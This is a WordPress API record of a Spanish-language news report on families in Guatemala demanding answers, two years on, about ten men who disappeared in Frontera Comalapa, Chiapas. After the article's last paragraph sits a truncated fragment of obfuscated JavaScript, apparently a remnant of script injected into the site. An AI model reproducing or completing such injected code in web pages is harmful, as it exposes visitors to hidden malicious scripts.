{"id":25249,"date":"2025-11-18T01:32:02","date_gmt":"2025-11-18T01:32:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25249"},"modified":"2025-11-18T01:32:03","modified_gmt":"2025-11-18T01:32:03","slug":"clamor-desde-guatemala-por-los-diez-hombres-desaparecidos-en-frontera-comalapa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25249","title":{"rendered":"Clamor desde Guatemala por los diez hombres desaparecidos en Frontera Comalapa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"589\" height=\"421\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000443506.jpg\" alt=\"\" class=\"wp-image-25250\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000443506.jpg 589w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000443506-300x214.jpg 300w\" sizes=\"auto, (max-width: 589px) 100vw, 589px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<\/p>\n\n\n\n<p>17 de noviembre del 2025. San Crist\u00f3bal de Las Casas.\u2013 A dos a\u00f1os de la desaparici\u00f3n de Dan Josu\u00e9 Rosales Tzun\u00fan, Jorge Luis De Le\u00f3n, Juan Carlos Calel De Le\u00f3n, Luis Alberto V\u00e1squez Sarat, Am\u00edlcar Isaac Enr\u00edquez Villatoro, Juan Francisco Tupul Garc\u00eda, Julio C\u00e9sar V\u00e1squez P\u00e9rez, Leonardo Morales \u00c1lvarez, Mayco Josu\u00e9 Morga Enr\u00edquez y Francisco Socorro Morga De Le\u00f3n, sus familias reiteraron que no han recibido respuestas sobre su paradero ni sobre los responsables de la desaparici\u00f3n ocurrida el 16 de noviembre de 2023 en Frontera Comalapa, Chiapas. Todos ellos se ganaban la vida en la venta de pollos de crecimiento y eran sost\u00e9n fundamental de sus hogares.<\/p>\n\n\n\n<p>En un comunicado de prensa, las familias se\u00f1alaron que estos dos a\u00f1os han sido de dolor, desgaste emocional y afectaciones econ\u00f3micas; aun as\u00ed, mantienen viva la esperanza y la exigencia de justicia. Por ello, pidieron a los Estados de M\u00e9xico y Guatemala fortalecer la coordinaci\u00f3n institucional, ejecutar planes de b\u00fasqueda efectivos \u2014en vida y en muerte\u2014 y presentar resultados concretos en la investigaci\u00f3n. Tambi\u00e9n exigieron la integraci\u00f3n de las muestras de ADN procesadas por el Equipo Argentino de Antropolog\u00eda Forense en los bancos forenses de todo M\u00e9xico.<\/p>\n\n\n\n<p>Asimismo, solicitaron que se garantice el ejercicio pleno de la calidad de v\u00edctimas reconocida recientemente por el Estado mexicano, y que Guatemala participe activamente en las mesas de trabajo binacionales para asegurar acompa\u00f1amiento, protecci\u00f3n y avances reales en la b\u00fasqueda transnacional. Las familias insistieron en que no renunciar\u00e1n a su lucha: \u201cSeguiremos buscando hasta encontrarles.\u201d<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal 17 de noviembre del 2025. San Crist\u00f3bal de Las Casas.\u2013 A dos a\u00f1os de la desaparici\u00f3n de Dan Josu\u00e9 Rosales Tzun\u00fan, Jorge Luis De Le\u00f3n, Juan Carlos Calel De Le\u00f3n, Luis Alberto V\u00e1squez Sarat, Am\u00edlcar Isaac Enr\u00edquez Villatoro, Juan Francisco Tupul Garc\u00eda, Julio C\u00e9sar V\u00e1squez P\u00e9rez, Leonardo Morales \u00c1lvarez, Mayco Josu\u00e9 Morga &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25250,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-25249","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25249","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25249"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25249\/revisions"}],"predecessor-version":[{"id":25251,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25249\/revisions\/25251"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25250"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25249"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25249"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25249"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}